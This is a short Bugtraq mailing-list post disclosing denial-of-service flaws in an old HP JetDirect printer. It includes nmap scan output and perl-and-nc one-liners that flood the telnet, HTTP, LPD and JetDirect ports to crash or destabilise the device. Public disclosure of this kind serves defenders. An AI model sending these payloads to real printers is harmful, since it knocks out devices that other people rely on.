
Re: Promiscuous email printing in Canon imageRunner



> Try scanning the Ip address with nmap -A 10.0.0.1

Hello Bugtraq,

While we're talking about printers, some time ago I discovered by accident 
some lame Denial of Service vulnerabilities in my HP JetDirect printer 
(tested on J3111A, firmware version G.05.35 -- pretty old). Not sure if 
they can be reproduced on newer models/firmwares.

Here we go:

root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?   
9100/tcp open  jetdirect? 
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

# telnet -> crash of all network services
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23

# http -> crash of all network services with funny stack dump on paper! ;)
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80

# printer -> the printer switches indefinitely between data recv and ready
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515

# jetdirect -> prints ABCD... and leaves the printer in "unstable" status
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

I've scanned the funny stack dump printed on paper and put it on-line at:

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

You should also take a look at Paul Szabo's excellent web resources on 
PostScript, PJL/PCL, and secure HP printer configuration:

http://www.maths.usyd.edu.au:8000/u/psz/ps.html

Cheers,

-- 
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707